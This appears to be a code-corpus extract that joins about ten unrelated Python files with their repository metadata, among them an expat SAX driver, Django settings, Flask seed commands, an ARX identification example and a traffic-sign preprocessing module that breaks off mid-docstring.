folders = os.listdir(destination)
working_folder = os.path.join(destination, pick(folders))
image_folder = os.path.join(destination, working_folder, config.get("folder-options.image-folder-name"))
video_folder = os.path.join(destination, working_folder, config.get("folder-options.video-folder-name"))
print("Done.\nCreating video..")
utils.Create_video(config, image_folder, video_folder)
print("Done.")
|
[
"starcraftd@gmail.com"
] |
starcraftd@gmail.com
|
f67035568dbbe0c11da1ca0f816a4be0f0dcfe27
|
35b77f2f50a64f8af7ae3b6ba2c9c7bae66eed43
|
/learnml/supervised/api.py
|
a64229c7793c8deaf578def9523cb09593074b25
|
[
"MIT"
] |
permissive
|
Rost381/learnml
|
9dbbac1f2ca238dda696299bcc87886eb178d7dc
|
2622cd2b9caf0cd00f6aac62f921cd1838ef5807
|
refs/heads/master
| 2022-02-27T01:25:29.285925
| 2019-10-14T18:28:55
| 2019-10-14T18:28:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 781
|
py
|
from .adaboost import AdaBoostClassifier
from .decision_tree import (ClassificationTree, RegressionTree,
XGBoostRegressionTree)
from .gradient_boosting import (GradientBoostingClassifier,
GradientBoostingRegressor)
from .k_nearest_neighbors import KNeighborsClassifier
from .linear_discriminant_analysis import LinearDiscriminantAnalysis
from .logistic_regression import LogisticRegression
from .naive_bayes import GaussianNB
from .perceptron import Perceptron
from .random_forest import RandomForestClassifier
from .regression import (LassoRegression, LinearRegression,
PolynomialRidgeRegression, RidgeRegression, ElasticNet)
from .support_vector_machine import svm
from .xgboost import XGBoost
|
[
"4571766+ByrainZhi@users.noreply.github.com"
] |
4571766+ByrainZhi@users.noreply.github.com
|
793c1d14191e4458ecb4d6bf7826224b4cc77b93
|
2ff7e53d5e512cd762217ca54317982e07a2bb0c
|
/xml/sax/expatreader.py
|
0907be74460830fd1afb203b1e7a14cbe9ed3983
|
[] |
no_license
|
nanxijw/Clara-Pretty-One-Dick
|
66d3d69426642b79e8fd4cc8e0bec23adeeca6d6
|
50de3488a2140343c364efc2615cf6e67f152be0
|
refs/heads/master
| 2021-01-19T09:25:07.555284
| 2015-02-17T21:49:33
| 2015-02-17T21:49:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,563
|
py
|
#Embedded file name: xml/sax\expatreader.py
"""
SAX driver for the pyexpat C module. This driver works with
pyexpat.__version__ == '2.22'.
"""
version = '0.20'
from xml.sax._exceptions import *
from xml.sax.handler import feature_validation, feature_namespaces
from xml.sax.handler import feature_namespace_prefixes
from xml.sax.handler import feature_external_ges, feature_external_pes
from xml.sax.handler import feature_string_interning
from xml.sax.handler import property_xml_string, property_interning_dict
import sys
if sys.platform[:4] == 'java':
raise SAXReaderNotAvailable('expat not available in Java', None)
del sys
try:
from xml.parsers import expat
except ImportError:
raise SAXReaderNotAvailable('expat not supported', None)
else:
if not hasattr(expat, 'ParserCreate'):
raise SAXReaderNotAvailable('expat not supported', None)
from xml.sax import xmlreader, saxutils, handler
AttributesImpl = xmlreader.AttributesImpl
AttributesNSImpl = xmlreader.AttributesNSImpl
try:
import _weakref
except ImportError:
def _mkproxy(o):
return o
else:
import weakref
_mkproxy = weakref.proxy
del weakref
del _weakref
class ExpatLocator(xmlreader.Locator):
"""Locator for use with the ExpatParser class.
This uses a weak reference to the parser object to avoid creating
a circular reference between the parser and the content handler.
"""
def __init__(self, parser):
self._ref = _mkproxy(parser)
def getColumnNumber(self):
parser = self._ref
if parser._parser is None:
return
return parser._parser.ErrorColumnNumber
def getLineNumber(self):
parser = self._ref
if parser._parser is None:
return 1
return parser._parser.ErrorLineNumber
def getPublicId(self):
parser = self._ref
if parser is None:
return
return parser._source.getPublicId()
def getSystemId(self):
parser = self._ref
if parser is None:
return
return parser._source.getSystemId()
class ExpatParser(xmlreader.IncrementalParser, xmlreader.Locator):
"""SAX driver for the pyexpat C module."""
def __init__(self, namespaceHandling = 0, bufsize = 65516):
xmlreader.IncrementalParser.__init__(self, bufsize)
self._source = xmlreader.InputSource()
self._parser = None
self._namespaces = namespaceHandling
self._lex_handler_prop = None
self._parsing = 0
self._entity_stack = []
self._external_ges = 1
self._interning = None
def parse(self, source):
"""Parse an XML document from a URL or an InputSource."""
source = saxutils.prepare_input_source(source)
self._source = source
self.reset()
self._cont_handler.setDocumentLocator(ExpatLocator(self))
xmlreader.IncrementalParser.parse(self, source)
def prepareParser(self, source):
if source.getSystemId() is not None:
self._parser.SetBase(source.getSystemId())
def setContentHandler(self, handler):
xmlreader.IncrementalParser.setContentHandler(self, handler)
if self._parsing:
self._reset_cont_handler()
def getFeature(self, name):
if name == feature_namespaces:
return self._namespaces
if name == feature_string_interning:
return self._interning is not None
if name in (feature_validation, feature_external_pes, feature_namespace_prefixes):
return 0
if name == feature_external_ges:
return self._external_ges
raise SAXNotRecognizedException("Feature '%s' not recognized" % name)
def setFeature(self, name, state):
if self._parsing:
raise SAXNotSupportedException('Cannot set features while parsing')
if name == feature_namespaces:
self._namespaces = state
elif name == feature_external_ges:
self._external_ges = state
elif name == feature_string_interning:
if state:
if self._interning is None:
self._interning = {}
else:
self._interning = None
elif name == feature_validation:
if state:
raise SAXNotSupportedException('expat does not support validation')
elif name == feature_external_pes:
if state:
raise SAXNotSupportedException('expat does not read external parameter entities')
elif name == feature_namespace_prefixes:
if state:
raise SAXNotSupportedException('expat does not report namespace prefixes')
else:
raise SAXNotRecognizedException("Feature '%s' not recognized" % name)
def getProperty(self, name):
if name == handler.property_lexical_handler:
return self._lex_handler_prop
if name == property_interning_dict:
return self._interning
if name == property_xml_string:
if self._parser:
if hasattr(self._parser, 'GetInputContext'):
return self._parser.GetInputContext()
raise SAXNotRecognizedException('This version of expat does not support getting the XML string')
else:
raise SAXNotSupportedException('XML string cannot be returned when not parsing')
raise SAXNotRecognizedException("Property '%s' not recognized" % name)
def setProperty(self, name, value):
if name == handler.property_lexical_handler:
self._lex_handler_prop = value
if self._parsing:
self._reset_lex_handler_prop()
elif name == property_interning_dict:
self._interning = value
elif name == property_xml_string:
raise SAXNotSupportedException("Property '%s' cannot be set" % name)
else:
raise SAXNotRecognizedException("Property '%s' not recognized" % name)
def feed(self, data, isFinal = 0):
if not self._parsing:
self.reset()
self._parsing = 1
self._cont_handler.startDocument()
try:
self._parser.Parse(data, isFinal)
except expat.error as e:
exc = SAXParseException(expat.ErrorString(e.code), e, self)
self._err_handler.fatalError(exc)
def close(self):
if self._entity_stack:
return
self.feed('', isFinal=1)
self._cont_handler.endDocument()
self._parsing = 0
self._parser = None
def _reset_cont_handler(self):
self._parser.ProcessingInstructionHandler = self._cont_handler.processingInstruction
self._parser.CharacterDataHandler = self._cont_handler.characters
def _reset_lex_handler_prop(self):
lex = self._lex_handler_prop
parser = self._parser
if lex is None:
parser.CommentHandler = None
parser.StartCdataSectionHandler = None
parser.EndCdataSectionHandler = None
parser.StartDoctypeDeclHandler = None
parser.EndDoctypeDeclHandler = None
else:
parser.CommentHandler = lex.comment
parser.StartCdataSectionHandler = lex.startCDATA
parser.EndCdataSectionHandler = lex.endCDATA
parser.StartDoctypeDeclHandler = self.start_doctype_decl
parser.EndDoctypeDeclHandler = lex.endDTD
def reset(self):
if self._namespaces:
self._parser = expat.ParserCreate(self._source.getEncoding(), ' ', intern=self._interning)
self._parser.namespace_prefixes = 1
self._parser.StartElementHandler = self.start_element_ns
self._parser.EndElementHandler = self.end_element_ns
else:
self._parser = expat.ParserCreate(self._source.getEncoding(), intern=self._interning)
self._parser.StartElementHandler = self.start_element
self._parser.EndElementHandler = self.end_element
self._reset_cont_handler()
self._parser.UnparsedEntityDeclHandler = self.unparsed_entity_decl
self._parser.NotationDeclHandler = self.notation_decl
self._parser.StartNamespaceDeclHandler = self.start_namespace_decl
self._parser.EndNamespaceDeclHandler = self.end_namespace_decl
self._decl_handler_prop = None
if self._lex_handler_prop:
self._reset_lex_handler_prop()
self._parser.ExternalEntityRefHandler = self.external_entity_ref
try:
self._parser.SkippedEntityHandler = self.skipped_entity_handler
except AttributeError:
pass
self._parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_UNLESS_STANDALONE)
self._parsing = 0
self._entity_stack = []
def getColumnNumber(self):
if self._parser is None:
return
return self._parser.ErrorColumnNumber
def getLineNumber(self):
if self._parser is None:
return 1
return self._parser.ErrorLineNumber
def getPublicId(self):
return self._source.getPublicId()
def getSystemId(self):
return self._source.getSystemId()
def start_element(self, name, attrs):
self._cont_handler.startElement(name, AttributesImpl(attrs))
def end_element(self, name):
self._cont_handler.endElement(name)
def start_element_ns(self, name, attrs):
pair = name.split()
if len(pair) == 1:
pair = (None, name)
elif len(pair) == 3:
pair = (pair[0], pair[1])
else:
pair = tuple(pair)
newattrs = {}
qnames = {}
for aname, value in attrs.items():
parts = aname.split()
length = len(parts)
if length == 1:
qname = aname
apair = (None, aname)
elif length == 3:
qname = '%s:%s' % (parts[2], parts[1])
apair = (parts[0], parts[1])
else:
qname = parts[1]
apair = tuple(parts)
newattrs[apair] = value
qnames[apair] = qname
self._cont_handler.startElementNS(pair, None, AttributesNSImpl(newattrs, qnames))
def end_element_ns(self, name):
pair = name.split()
if len(pair) == 1:
pair = (None, name)
elif len(pair) == 3:
pair = (pair[0], pair[1])
else:
pair = tuple(pair)
self._cont_handler.endElementNS(pair, None)
def processing_instruction(self, target, data):
self._cont_handler.processingInstruction(target, data)
def character_data(self, data):
self._cont_handler.characters(data)
def start_namespace_decl(self, prefix, uri):
self._cont_handler.startPrefixMapping(prefix, uri)
def end_namespace_decl(self, prefix):
self._cont_handler.endPrefixMapping(prefix)
def start_doctype_decl(self, name, sysid, pubid, has_internal_subset):
self._lex_handler_prop.startDTD(name, pubid, sysid)
def unparsed_entity_decl(self, name, base, sysid, pubid, notation_name):
self._dtd_handler.unparsedEntityDecl(name, pubid, sysid, notation_name)
def notation_decl(self, name, base, sysid, pubid):
self._dtd_handler.notationDecl(name, pubid, sysid)
def external_entity_ref(self, context, base, sysid, pubid):
if not self._external_ges:
return 1
source = self._ent_handler.resolveEntity(pubid, sysid)
source = saxutils.prepare_input_source(source, self._source.getSystemId() or '')
self._entity_stack.append((self._parser, self._source))
self._parser = self._parser.ExternalEntityParserCreate(context)
self._source = source
try:
xmlreader.IncrementalParser.parse(self, source)
except:
return 0
self._parser, self._source = self._entity_stack[-1]
del self._entity_stack[-1]
return 1
def skipped_entity_handler(self, name, is_pe):
if is_pe:
name = '%' + name
self._cont_handler.skippedEntity(name)
def create_parser(*args, **kwargs):
return ExpatParser(*args, **kwargs)
if __name__ == '__main__':
import xml.sax.saxutils
p = create_parser()
p.setContentHandler(xml.sax.saxutils.XMLGenerator())
p.setErrorHandler(xml.sax.ErrorHandler())
p.parse('http://www.ibiblio.org/xml/examples/shakespeare/hamlet.xml')
|
[
"billchang.e@gmail.com"
] |
billchang.e@gmail.com
|
a4bc62260d98fa21619b0221d52ce92634f76ec3
|
a65e5dc54092a318fc469543c3b96f6699d0c60b
|
/Personel/Ruthwik/Python/4mar/prime_check.py
|
6b605513ebd7ca83f57d7ca66e8560309982ba03
|
[] |
no_license
|
shankar7791/MI-10-DevOps
|
e15bfda460ffd0afce63274f2f430445d04261fe
|
f0b9e8c5be7b28298eb6d3fb6badf11cd033881d
|
refs/heads/main
| 2023-07-04T15:25:08.673757
| 2021-08-12T09:12:37
| 2021-08-12T09:12:37
| 339,016,230
| 1
| 0
| null | 2021-08-12T09:12:37
| 2021-02-15T08:50:08
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 542
|
py
|
#Python function that takes a number as a parameter and check the number is prime or not.
def isPrime(n) :
if (n <= 1) :
return False
if (n <= 3) :
return True
if (n % 2 == 0 or n % 3 == 0) :
return False
i = 5
while(i * i <= n) :
if (n % i == 0 or n % (i + 2) == 0) :
return False
i = i + 6
return True
n1=int(input("Enter a number : "))
if (isPrime(n1)) :
print("It is a prime number ")
else :
print("It is not a prime number")
|
[
"ruthwikraja@gmail.com"
] |
ruthwikraja@gmail.com
|
fbb35df666161f55624d3f6f2b173de3ab78aca0
|
6b185446d3ae1500e7b5b2a6174cc49c455af33d
|
/category.py
|
4bb0a4ab7507dbe32ae53503ef7775e0f29b8a43
|
[] |
no_license
|
xiangbohua/python_spider
|
27d7cc535988751e418530d5681fef044275f4e4
|
9d401a46a44f38e76391597ddf2d5f723108f308
|
refs/heads/master
| 2020-03-19T19:31:38.607195
| 2018-06-11T02:37:35
| 2018-06-11T02:37:35
| 136,860,925
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 267
|
py
|
#!/usr/local/bin/python3
# -*- conding: utf8 -*-
from dbObject import DbObject
class Category(DbObject):
def getFields(self):
return ['mark','c_name','c_url','level','parent_name','c_index','processed']
def getRuntimeProp(self):
return []
|
[
"xiangbohua@hotmail.com"
] |
xiangbohua@hotmail.com
|
1cc18b9cc6e643592b97461aa5192b57443538ce
|
a0d265fdd4d530f39053cd58b2c885f7ec3f7776
|
/examples/arx_identifier.py
|
2297c10df668fd86dca097d4b7f4f856955e1e0c
|
[] |
no_license
|
el-hult/lava
|
c062062db0004190b7d2b188871034e0d9719921
|
1419e0946d122449ccc8c4798251aa582b87ef20
|
refs/heads/master
| 2020-05-15T02:12:25.240511
| 2019-09-23T12:39:39
| 2019-09-23T12:39:39
| 182,044,821
| 0
| 0
| null | 2019-04-18T08:08:13
| 2019-04-18T08:08:12
| null |
UTF-8
|
Python
| false
| false
| 3,539
|
py
|
"""
System identification with ARX model
------------------------------------
Makes regression of a AR system.
Shows that by letting the AR components be in the Latent Regressor Model, correct order is identified.
Runs twice - once with a Nominal model, and once with a Latent Model.
Showcases that the LAVA algorithm penalizes the irrelevant regressor coefficients.
"""
# Standard library imports
import math
# 3rd party imports
import numpy as np
import matplotlib.pyplot as plt
# local imports
import lava.core as lava
# Setup
np.random.seed(0)
# Options
A = np.array([[.95, .2],
[-.2, .95]])
B = np.array([[.3, 0],
[0, 0.1]])
N = 400
ar_order = 4
# generate data
N_fit = int(math.ceil(N / 2))
N_test = N - N_fit
U = np.random.normal(0, 1, size=(2, N))
X = np.zeros((2, N))
X[:, 0:2] = np.array([[2, -2], [2, -2]]).T
measurement_noise = np.random.normal(0, .2, X.shape)
for t in range(N - 2):
X[:, t + 2] = A @ X[:, t] + B @ U[:, t + 1]
Y = X + measurement_noise
# train lava model and plot results
# do this twice - once with ARX overparametrized as latent, and once as nominal model
for k in [0, 1]:
arx_regressor = lava.ARXRegressor(y_lag_max=ar_order, u_lag_max=ar_order)
intercept_regressor = lava.InterceptRegressor()
if k == 0:
lb = lava.Lava(nominal_model=intercept_regressor, latent_model=arx_regressor)
else:
lb = lava.Lava(nominal_model=arx_regressor, latent_model=intercept_regressor)
for t in range(N_fit):
lb.step(y=Y[:, t], u=U[:, t], n_recursive_rounds=30)
# predict with lava model
Y_hat, _, _ = lb.simulate(u=U[:, N_fit:N_fit + N_test])
# plot results
t_all = np.arange(0, N)
t_pred = np.arange(N_test, N)
plt.subplot(2, 1, 1)
plt.plot(t_all, X[0, :])
plt.plot(t_pred, Y_hat[0, 0:N_test], ":")
plt.legend(["y", "y_hat"])
plt.subplot(2, 1, 2)
plt.plot(t_all, X[1, :])
plt.plot(t_pred, Y_hat[1, 0:N_test], ":")
plt.legend(["y", "y_hat"])
plt.suptitle(
f"Predictions, using {lb.nominal_model.__class__.__name__} as nominal, "
f"and {lb.latent_model.__class__.__name__} as latent", fontsize=10)
plt.show()
plt.figure()
ar_matrix = lb.Theta if k == 1 else lb.Z
affects_names = ['y0', 'y1']
affecting_names_y = [f"{p} Lag{l}" for l in range(1, ar_order + 1) for p in affects_names]
affecting_names_u = [f"{p} Lag{l}" for l in range(1, ar_order + 1) for p in ['u0', 'u1']]
affecting_names = [*affecting_names_y, *affecting_names_u, 'Intercept']
fig = plt.figure()
ax = plt.gca()
im = plt.imshow(ar_matrix)
# We want to show all ticks...
ax.set_yticks(np.arange(len(affects_names)))
ax.set_xticks(np.arange(len(affecting_names)))
# ... and label them with the respective list entries
ax.set_yticklabels(affects_names)
ax.set_xticklabels(affecting_names)
# Rotate the tick labels and set their alignment.
plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
rotation_mode="anchor")
# Loop over data dimensions and create text annotations.
for i in range(len(affects_names)):
for j in range(len(affecting_names)):
text = ax.text(j, i, ar_matrix[i, j].round(2),
ha="center", va="center", color="w")
ax.set_title(
f"AR-matrices, using {lb.nominal_model.__class__.__name__} as nominal, and"
f" {lb.latent_model.__class__.__name__} as latent", fontsize=10)
fig.tight_layout()
plt.show()
|
[
"ludvig.hult@gmail.com"
] |
ludvig.hult@gmail.com
|
744320eb29d18c77fb9713727ff7d58839e221a1
|
5bcf871c70207c8800caaef55f98b260af94ad14
|
/src/commands.py
|
23ae00d8787c99267006aca573a031db69147ff0
|
[] |
no_license
|
petelah/Flask-Rest-CC
|
72dc391e7f1bf7531146cf79c0b4c1d69a193c41
|
eac303a66578f7941156b537ddccb03f5585a6ee
|
refs/heads/main
| 2023-03-19T04:57:40.381047
| 2021-03-09T00:33:41
| 2021-03-09T00:33:41
| 345,835,084
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,180
|
py
|
from flask import Blueprint, current_app
from src import db
db_commands = Blueprint("db-custom", __name__)
@db_commands.cli.command("create")
def create_db():
db.create_all()
print("DB Created")
@db_commands.cli.command("drop")
def drop_db():
db.drop_all()
db.engine.execute("DROP TABLE IF EXISTS alembic_version;")
print("Tables deleted")
@db_commands.cli.command("seed")
def seed_db():
from src.models.User import User
from src import bcrypt
from faker import Faker
import random
faker = Faker()
users = []
TEST_PASSWORD = current_app.config["TEST_PASSWORD"]
if not TEST_PASSWORD:
raise ValueError('TEST_PASSWORD not provided.')
for i in range(5):
# Add users
user = User()
user.email = f"test{i}@test.com"
user.bio = faker.paragraph(nb_sentences=3)
user.username = f"test{i}"
user.first_name = faker.first_name()
user.last_name = faker.last_name()
user.password = bcrypt.generate_password_hash(f"{TEST_PASSWORD}").decode("utf-8")
db.session.add(user)
db.session.commit()
print("Users Added")
print("Tables seeded")
|
[
"seabrook.peter@gmail.com"
] |
seabrook.peter@gmail.com
|
aa6d4d82fe1ced7946042ccc6d540cad9075da16
|
216d96ff265457e2ca32e93bd88b9ee437154a52
|
/grasp/src/image2hdf5_v1.py
|
cf51a4f42010540dd2746b15d30128d9ec8e9f76
|
[] |
no_license
|
austin2408/Grasp_drl
|
b752029bd60f7c1a7654df64517439a050df26d4
|
26f9c20503e3e7a3da4462e03fb634ce0a2c55f4
|
refs/heads/main
| 2023-09-03T21:32:27.322133
| 2021-11-05T05:32:29
| 2021-11-05T05:32:29
| 380,958,346
| 0
| 1
| null | 2021-11-05T05:32:30
| 2021-06-28T08:21:31
|
Python
|
UTF-8
|
Python
| false
| false
| 5,994
|
py
|
from ast import iter_child_nodes
import h5py
import cv2
import numpy as np
import matplotlib.pyplot as plt
import os
import math
import random
import json
import warnings
warnings.filterwarnings("ignore")
Path = '/home/austin/DataSet/grasp_drl/datasets'
ratio = 1
count = [0,0]
Filter_0 = 1
mm = 10000
# Divide origin angle into 4 categories
# prediction: list with length 4
# | index | tool |
# | --- | --- |
# | 0 | gripper with -90 deg |
# | 1 | gripper with -45 deg |
# | 2 | gripper with 0 deg |
# | 3 | gripper with 45 deg |
def angle_class_4(theta_):
angle = [0, 45, 90, 135]
if (theta_ >angle[0] -22.5) and (theta_ < angle[0] + 22.5): # 0 +- 22.5
return 2
if (theta_ > angle[1] - 22.5) and (theta_ < angle[1] + 22.5): # 45 +- 22.5
return 1
if (theta_ > angle[2] - 22.5) and (theta_ < angle[2] + 22.5): # 90 +- 22.5
return 0
if (theta_ > angle[3] - 22.5) and (theta_ < angle[3] + 22.5): # 135 +- 22.5
return 3
if (theta_ > angle[3] + 22.5) and (theta_ < 180): # 180 - 180-22.5
return 2
def json2action(idx, do, i=0):
if do == 'bad':
i=1
with open(Path+'/episode_'+idx+'/rgb/rgb_'+idx+'_0.json',"r") as F:
data = json.load(F)
coord = data['shapes'][i]['points']
x = int((int(coord[0][0]) + int(coord[1][0]))/2)
y = int((int(coord[0][1]) + int(coord[1][1]))/2)
x_ = coord[0][0] - coord[1][0]
y_ = coord[0][1] - coord[1][1]
if y_ > 0:
x_ = -x_
y_ = abs(y_)
if y_ < 0.001:
theta = 0
else:
theta = math.atan2(y_, x_)
theta = int(math.degrees(theta))
return y, x, theta
def logger(path, File_name):
name_list = os.listdir(path)
with h5py.File(File_name,'w') as f:
for name in name_list:
num = name.split('_')[1]
# Success action
y, x, theta = json2action(num, 'good')
a_t = angle_class_4(theta)
# Failed image
yf, xf, thetaf = json2action(num, 'bad')
a_tf = angle_class_4(thetaf)
# state image
color = cv2.imread(path+'/episode_'+num+'/rgb/rgb_'+num+'_0.jpg')
color = color[:,:,[2,1,0]]
color = cv2.resize(color, (224,224))
depth = np.load(path+'/episode_'+num+'/depth/depth_'+num+'_0.npy')
depth[ depth > mm ] = 0
# next state image
color2 = cv2.imread(path+'/episode_'+num+'/rgb/rgb_'+num+'_1.jpg')
color2 = color2[:,:,[2,1,0]]
color2 = cv2.resize(color2, (224,224))
depth2 = np.load(path+'/episode_'+num+'/depth/depth_'+num+'_1.npy')
depth2[ depth2 > mm ] = 0
if a_t == 2:
no_Filter_0 = True if random.random() < Filter_0 else False
else:
no_Filter_0 = True
if no_Filter_0:
# ------------------------------Success transition------------------------------ #
g1=f.create_group("iter_"+num)
g1["reward"] = np.array([5])
g1["origin_theta"] = np.array([theta])
g1["action"] = np.array([a_t, int(y), int(x)])
if (int(y)>224) or (int(x)>224):
print('The image shape in '+name+' is wrong !')
# Get state
g2 = g1.create_group("state")
g2.create_dataset('color', (224,224,3), data=color)
g2.create_dataset('depth', (224,224), data=depth)
# Get next state
g3 = g1.create_group("next_state")
g3.create_dataset('color', (224,224,3), data=color2)
g3.create_dataset('depth', (224,224), data=depth2)
g3["empty"] = np.array([True])
count[0] += 1
# ------------------------------Fail transition------------------------------ #
Do = True if random.random() < ratio else False
if Do:
g1=f.create_group("iter_"+num+"_2")
# Get state
g1["reward"] = np.array([-5])
g1["origin_theta"] = np.array([thetaf])
g1["action"] = np.array([a_tf, int(yf), int(xf)])
g2 = g1.create_group("state")
g2.create_dataset('color', (224,224,3), data=color)
g2.create_dataset('depth', (224,224), data=depth)
# Get next state
g3 = g1.create_group("next_state")
g3.create_dataset('color', (224,224,3), data=color)
g3.create_dataset('depth', (224,224), data=depth)
g3["empty"] = np.array([False])
count[1] += 1
print('Done')
File_name = '/home/austin/Grasp_drl/grasp/src/sean_approach/datasets/Logger_v1.hdf5'
logger(Path, File_name)
id = 'iter_725'
# Check
f = h5py.File(File_name)
print('Get ',len(f.keys()), ' transitions')
print('Success : ',count[0], ' Fail : ', count[1])
print('========================')
group = f[id]
for key in group.keys():
print(key)
print('========================')
print(group['state'])
print(group['action'])
print(group['reward'])
print(group['next_state'])
print('========================')
for key in group['next_state']:
print(key)
color = f[id+'/state/color'].value
depth = f[id+'/state/depth'].value
colorn = f[id+'/next_state/color'].value
depthn = f[id+'/next_state/depth'].value
print('========================')
print(group['next_state/empty'])
em = group['next_state/empty']
print(em.value)
print(color.shape)
print(depth.shape)
action = group['action']
reward = group['reward']
theta = group['origin_theta']
print(action.value)
print(reward.value)
print(theta.value)
_, axarr = plt.subplots(2,2)
axarr[0][0].imshow(color)
axarr[0][1].imshow(depth)
axarr[1][0].imshow(colorn)
axarr[1][1].imshow(depthn)
plt.show()
|
[
"sdnd93612@gmail.com"
] |
sdnd93612@gmail.com
|
ecf76394a1017c48ff5b7ab93dc3fb8c7fc165ab
|
14cae788e05904b0305005e7818f9a8c0fba53a6
|
/miniAPI/settings.py
|
b44062c08a812441c82e887bf5354b5f6f776a7c
|
[] |
no_license
|
hanifsarwary/mini-api
|
acca432ec8733830b0a30266cd7c3e0bd0deeb6a
|
2625aea042390efb3dfe580cea22e89d9ee3dde8
|
refs/heads/master
| 2023-03-28T05:36:21.678651
| 2021-03-26T07:30:45
| 2021-03-26T07:30:45
| 351,678,372
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,086
|
py
|
"""
Django settings for miniAPI project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ')_^(8g#-irc=#7^p3&dpv27u$%%m1a1(&3k=k3012#ay_5h-#i'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'miniAPI.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'miniAPI.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
|
[
"muhammad.hanif@synavos.com"
] |
muhammad.hanif@synavos.com
|
8af1c52de31314b33e3ad6ab51f610c75600a88a
|
0cde0ff3ae5d818786e4b7c103939ea5a73ff146
|
/processor.py
|
e3d299c3a0c80a31532d34d1c6ed42cd962d7ff6
|
[] |
no_license
|
peteratt/traffic-signs
|
d4985b085f81b49eeef7f8ce498ba69e825c20be
|
17d227129999fc2c2e63293ae68dbeaabc93d98c
|
refs/heads/master
| 2021-01-11T19:52:10.855749
| 2017-01-29T23:40:42
| 2017-01-29T23:40:42
| 79,411,505
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,455
|
py
|
import cv2
import numpy as np
import math
import random
### Preprocess the data here.
### Feel free to use as many code cells as needed.
def get_n_img_per_class(labels):
n_img_per_class = []
current_y = 0
current_count = 0
for y in labels:
if y == current_y:
current_count += 1
else:
current_y = y
n_img_per_class.append(current_count)
current_count = 1
n_img_per_class.append(current_count)
return n_img_per_class
def extract_validation_set(X_train, y_train):
total_images, rows, cols, color_depth = X_train.shape
new_X_train = np.copy(X_train)
new_y_train = np.copy(y_train)
X_validate = np.empty((0, rows, cols, color_depth), dtype=X_train.dtype)
y_validate = np.array([], dtype=y_train.dtype)
n_img_per_class = get_n_img_per_class(y_train)
start_index = 0
for n_img in n_img_per_class:
n_picks = int(n_img / 10)
index_interval = list(range(start_index, start_index + n_img))
index_list = np.random.choice(index_interval, n_picks, replace=False)
index_list = np.sort(index_list)
X_validate = np.append(X_validate, np.take(X_train, index_list, 0), 0)
y_validate = np.append(y_validate, np.take(y_train, index_list))
new_X_train = np.delete(new_X_train, index_list, 0)
new_y_train = np.delete(new_y_train, index_list)
start_index = start_index + n_img
return {
'X_train': new_X_train,
'y_train': new_y_train,
'X_validate': X_validate,
'y_validate': y_validate
}
# Taken from https://github.com/lisa-lab/pylearn2/blob/master/pylearn2/expr/preprocessing.py
def _contrast_normalize(X, scale=1., subtract_mean=True, use_std=True, sqrt_bias=10., min_divisor=1e-8):
"""
Global contrast normalizes by (optionally) subtracting the mean
across features and then normalizes by either the vector norm
or the standard deviation (across features, for each example).
Parameters
----------
X : ndarray, 2-dimensional
Design matrix with examples indexed on the first axis and \
features indexed on the second.
scale : float, optional
Multiply features by this const.
subtract_mean : bool, optional
Remove the mean across features/pixels before normalizing. \
Defaults to `True`.
use_std : bool, optional
Normalize by the per-example standard deviation across features \
instead of the vector norm. Defaults to `False`.
sqrt_bias : float, optional
Fudge factor added inside the square root. Defaults to 0.
min_divisor : float, optional
If the divisor for an example is less than this value, \
do not apply it. Defaults to `1e-8`.
Returns
-------
Xp : ndarray, 2-dimensional
The contrast-normalized features.
Notes
-----
`sqrt_bias` = 10 and `use_std = True` (and defaults for all other
parameters) corresponds to the preprocessing used in [1].
References
----------
.. [1] A. Coates, H. Lee and A. Ng. "An Analysis of Single-Layer
Networks in Unsupervised Feature Learning". AISTATS 14, 2011.
